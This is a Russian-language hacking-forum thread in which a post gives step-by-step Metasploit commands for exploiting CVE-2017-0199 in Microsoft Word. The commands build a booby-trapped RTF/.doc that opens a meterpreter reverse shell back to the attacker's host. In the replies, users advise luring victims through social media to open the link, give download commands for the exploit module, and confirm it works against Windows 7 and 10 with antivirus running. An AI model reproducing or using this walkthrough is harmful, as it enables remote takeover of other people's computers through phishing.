ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Этичный хакинг или пентестинг (https://forum.antichat.xyz/forumdisplay.php?f=209)
-   -   Доступ к удаленному хосту (Microsoft Word) (https://forum.antichat.xyz/showthread.php?t=559606)

Vander 11.05.2017 23:40

Привет всем! В этой статье я хочу показать, как можно получить активную сессию meterpreter, на удаленном хосте (Windows 8.1., Windows 7, Windows Server 2008) используя скрипт python который генерирует .rtf-файл для атаки. Все необходимое включено в Metasploit Framework.

https://forum.antichat.xyz/attachmen...2af45444ed.png

Этот модуль создает вредоносный файл RTF, который при открытии в уязвимых версиях Microsoft Word приведет к выполнению кода. Уязвимость состоит в том, когда объект OLE может сделать запрос http(s) и выполнить hta-код в ответ.

OLE— технология связывания и внедрения объектов в другие документы и объекты, разработанная корпорацией Майкрософт.

OLE позволяет передавать часть работы от одной программы редактирования к другой и возвращать результаты назад. Установленная на персональном компьютере издательская система может послать текст на обработку в текстовый редактор, либо изображение в редактор изображений с помощью OLE-технологии.

Основное преимущество OLE —она позволяет создать главный файл, картотеку функций, к которой обращается программа. Этот файл может оперировать данными из исходной программы, которые после обработки возвращаются в исходный документ.

Эта ошибка была изначально замечена в октябре 2016 года. Модуль был создан путем обращения вспять общедоступного образца вредоносной программы.

Начнем:

> use exploit/windows/fileformat/office_word_hta

> set srvhost 192.168.0.106

> set payload windows/meterpreter/reverse_tcp

> set filename order.doc

> set lhost 192.168.0.106

> exploit

https://forum.antichat.xyz/attachmen...7999c2e622.png


Выделенная ссылка, на скриншоте ниже должна быть доставлена целевой хост:

https://forum.antichat.xyz/attachmen...da30e63055.png

Переход по ней и открытие скачанного файла, откроет активную сессию meterpreter:

https://forum.antichat.xyz/attachmen...ff849693da.png

> sysinfo

https://forum.antichat.xyz/attachmen...fd5e8de6cc.png


На этом все, спасибо за внимание.

Vertigo 12.05.2017 20:36

Цитата:


CVlad сказал(а):

какие версии офиса подвержены данной уязвимости?


Уязвимость выстрелила как зеро-дэй. Речь шла о всех версиях. Так прошёл год )) Ждали от Майкрософта обновления с патчами.
11.04.2017 они действительно вышли и большей частью для МО 2016,2013,2010 г.
Но всё равно подозрительная тишина в отношении успеха.
Возможно ,пока к исчерпывающим ответам не готовы компании на рынке ИБ.
Кроме того, этого же числа , поддержка Win Vista должна быть прекращена по планам.
И это для поддерживаемых ОС,либо озадаченых обновлением пакета безопасности для МО.

XuliNam 12.05.2017 22:05

Цитата:


Oksy сказал(а):

Пожалуйста поподробнее объясните, что сделать с данной ссылкой. Как запустить meterpreter, как использовать. Не кидайте тапками, только начинаю знакомство с эксплойтами и метасплойтом


да никто не кидает тапки)) ссылку доставь в контакте или еще как нить и убеди, что емц необходимо посмотреть этот документ)) короче изучай соц инженерию )

Vertigo 12.05.2017 22:05

Цитата:


Oksy сказал(а):

Пожалуйста поподробнее объясните, что сделать с данной ссылкой. Как запустить meterpreter, как использовать.


Вам надо воспользоваться поиском по форуму,задать теги meterpreter , metasploit .
Очень много отличных статей вышло от наших известных авторов.Быстро изучить не получится,т.к инструмент
огромен по функционалу. Ссылка, как вариант , прилагается к письму и отсылается с рассчётом на прочтение.

ghostphisher 12.05.2017 22:25

К сожалению в Parrot OS не попал, на момент написания поста, данный эксплоит в MSF. Но его можно качнуть и добавить руками в папу /usr/share/metasploit-framework/modules/exploits/windows/fileformat/

качнуть код - под хайд

https://packetstormsecurity.com/files/142281/office_word_hta.rb.txt

Но это не все, что бы не получить ошибку:
Exploit failed: Errno::ENOENT No such file or directory @ rb_sysopen - /usr/share/metasploit-framework/data/exploits/cve-2017-0199.rtf

качаем:
wget https://raw.githubusercontent.com/n...CVE-2017-0199/data/exploits/cve-2017-0199.rtf

стартуем, пробуем =)

ТС - респект за оперативный топик =)

XuliNam 12.05.2017 22:36

Цитата:


ghostphisher сказал(а):

К сожалению в Parrot OS не попал, на момент написания поста, данный эксплоит в MSF. Но его можно качнуть и добавить руками в папу /usr/share/metasploit-framework/modules/exploits/windows/fileformat/

качнуть код - под хайд

***Скрытый текст***

ТС - респект за оперативный топик =)


Cпс ты как всегда спасаешь Parrot OS

ghostphisher 12.05.2017 23:12

Все работает

win7 SP1 Эннтерпрайз

XuliNam 13.05.2017 01:06

отлично прошлось по виндовс 10 при работающем авасте )) но при скачивании гугл Хром ругаеться, что фаил может быть плохой и навредит компу))
[doublepost=1494623166,1494620336][/doublepost]добавлю ) после открытия файла на вин10 ) на панели висит непонятный значек, который напрягает и привлекает внимание)

Vander 01.06.2017 20:22

Цитата:


jaguar сказал(а):

Failed to load module: exploit/windows/fileformat/office_word_hta
msf > и как загрузить модуль?


А версия metasploit какая?

Vander 01.06.2017 20:53

Цитата:


jaguar сказал(а):

metasploit v4.12.22-dev
+ -- --=[ 1577 exploits - 906 auxiliary - 272 post
+ -- --=[ 455 payloads - 39 encoders - 8 nops
+ -- --=[ Free Metasploit Pro trial:


Стоит проапдейтить систему,


Время: 02:32